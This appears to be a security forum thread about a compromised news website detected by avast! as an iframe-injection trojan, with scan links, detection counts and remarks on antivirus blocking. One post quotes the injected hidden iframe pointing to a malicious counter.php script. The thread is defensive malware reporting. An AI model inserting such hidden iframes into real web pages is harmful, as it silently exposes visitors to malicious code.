Again the marvelous avast! Web Shield detects...

It blocks and detects: JS:Iframe-DOI[Trj] here for this site: htxp://quttera.com/detailed_report/frontporchnewstexas.com
See: https://www.virustotal.com/nl/url/616bb3978b0fd51d23dd2abe8b9c6e678fccb4e92bcc5c0281dc513a81a4b5d7/analysis/
and http://urlquery.net/report.php?id=8358034 with a snort IDS alert Snort Alert [1:27242:2]

IP bad web host-> https://www.virustotal.com/nl/ip-address/97.74.215.194/information/
iFrame check:
Suspicious <iframe src=“htxp://rmai.in/counter.php” style=“visibility: hidden; position: absolute; left: 0px; top: 0px” width=“10”
and Injection Check:
Suspicious Text after HTML

New scan: https://www.virustotal.com/de/url/616bb3978b0fd51d23dd2abe8b9c6e678fccb4e92bcc5c0281dc513a81a4b5d7/analysis/1386890616/
6 out of 51 detect it now.

Hi Steven Winderlich,

Thanks for checking, but click through and the overall situation is better still, 18 now to flag the scan results: https://www.virustotal.com/nl/file/3861d5fe92fce0d1760eb7c11599a1d0284417913c19d549e6b174ef4a8e9479/analysis/1386552730/
and avast! as HTML:Iframe-ZG [Trj]
But web shield detection is to be preferred as it detects and blocks, so the old OS and the browser never connected out and do not even have a chance to contact the malcode at hand. But to be sure, I always perform a full scan of the browser cache etc. in the aftermath for “flag remainders of encountering malcode” even when run in a VM or sandbox. Just to be absolutely sure sure :wink:

Damian

That scan is 4 days old, can you make a fresh one? :wink:

Its funny that Kaspersky displays a message that a phishing link in IE can be used
to steal personal information, AND IT DETECTS THE SCRIPT MALWARE, but its not blocked completely.

Read here: http://webcache.googleusercontent.com/search?q=cache:8gu23oEUsKQJ:www.viruss.eu/virus-alert/malware-entry-mwiframeenc1560/+&cd=1&hl=nl&ct=clnk&gl=nl
Right as it says: N.B.

that every PHP, HTML and JS file gets compromised by this malware
quote from above link - source av robot
This info underlines your comment!

polonus